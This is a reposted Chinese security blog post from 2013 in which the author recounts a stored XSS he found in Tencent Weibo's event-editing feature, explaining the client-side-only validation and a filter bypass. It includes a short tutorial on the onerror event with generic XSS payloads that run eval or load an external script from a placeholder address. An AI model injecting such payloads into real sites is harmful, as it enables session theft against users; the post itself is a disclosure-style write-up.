记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

我是如何三杀腾讯大老爷的之first blood

2013-10-07 17:25

本帖最后由 redrain 于 2013-10-5 16:24 编辑

听说征文可以送书?好吧,我圆润的滚进来了
Author:redrain
Blog:http://www.fuckgcd.net
这个洞是好久好久以前的了,当时和基友玩了发出去的,文章也是以前写的,貌似被转载过好几次。。。不知道这样的老物算不算数,就用这个例子来讲好了(以下均为漏洞复现)
在之前,腾讯微博有一个功能叫做微活动,这个xss就是微活动引起的了,在编辑活动内容中添加图片并通过Firefox的神器firebug添加事件即可成功利用该存储型xss。
<ignore_js_op> 我是如何三杀腾讯大老爷的之first blood
如上图,编辑html后在img标签里添加事件,并写入收信平台的地址,因为这里之前测试的时候有个效过滤,就通过编码绕过了,过滤内容为“script”
下面是科普内容:
0×01 什么叫做onerror事件
onerror 事件会在文档或图像加载过程中发生错误时被触发。此处我们就是在图片加载的过程中利用的oonerror事件
语法如下

  1. onerror=”SomeJavaScriptCode”

复制代码

分别
<img>, <object>, <style>这些标签都可以使用该事件
window, image这些javascript对象均支持该事件
举个例子:
比如

  1. <img src=”图片地址” onerror=”alert(‘加载出错.’)” />

复制代码

当图片载入出错的时候就会弹出个框“加载出错”,这个大家可以自己就试试~
如:

  1. <html>
  2. <body>
  3. <img src=”image.gif”
  4. onerror=”alert(‘因为没有这个图片,所以加载出错.’)”>
  5. </body>
  6. </html>

复制代码

0×02 通过onerror事件xss

  1. <img src=”x” onerror=eval(“xxxxxxxx”)></img>

复制代码

  1. onerror=”with(document)body.appendChild(createElement(‘script’)).src=’xxxxxxxxx’”

复制代码

  1. <img src=x onerror=’javascript:document.write(“<script src=xxxxxxxxxxx></script>”)’></img>

复制代码

这几个都是利用onerror事件进行xss的,就是说,只要满足onerror的基本语法,怎么x都行
如果你还想了解更多该事件的用法,请看此处(描述DOM Event对象的)因为onerror是该对象的一员
以及此处,描述onerror基础知识,讲的比我详细

总结和亮点:xss还是很猥琐的,只要思路淫荡,怎么着利用都成,就像我举得这个例子,本来单纯添加图片不可能会有onerror事件的,但是不知道你有没有注意到,该处腾讯的验证机制是全局的html编辑完成后点下一步才提交的服务器,就是说我可以在他验证之前在我的前端随意编辑好后再提交,所以造成了这个存储型xss

PS.如果你感兴趣怎么玩儿一些常用的bypass,可以结合我博客里的这篇文章:http://www.fuckgcd.net/wordpress/archives/153

  • » 转载保留版权:Panni_007 Security
  • » 本文链接地址:我是如何三杀腾讯大老爷的之first blood
  • » 如果喜欢可以:点此订阅本站
  • 53d4e0d893227499f659c9d8412ed85a

    转载请注明:Panni_007 Security » 我是如何三杀腾讯大老爷的之first blood

    知识来源: panni007.com/2013/10/07/1504.html

    阅读:66911 | 评论:0 | 标签:黑客攻防

    想收藏或者和大家分享这篇好文章→复制链接地址

    “我是如何三杀腾讯大老爷的之first blood”共有0条留言

    发表评论

    姓名:

    邮箱:

    网址:

    验证码:

    公告

    关注公众号hackdig,学习最新黑客技术

    推广

    工具

    标签云